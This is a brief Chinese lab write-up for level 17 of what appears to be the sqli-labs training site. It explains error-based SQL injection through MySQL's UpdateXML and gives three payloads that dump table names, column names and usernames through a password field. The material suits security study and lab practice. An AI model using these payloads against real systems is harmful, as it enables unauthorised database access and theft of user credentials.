第十七关:
UpdateXML(xml_target, xpath_expr, new_xml)
其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。
发现密码存在注入点
1’ and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3)
1’ and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=’database()’ and table_name=’users’)),3)#
uname=admin&passwd=1' and updatexml(1,concat(1,(select group_concat(username) from(select username from users)a),1),3)#&submit=Submit
结束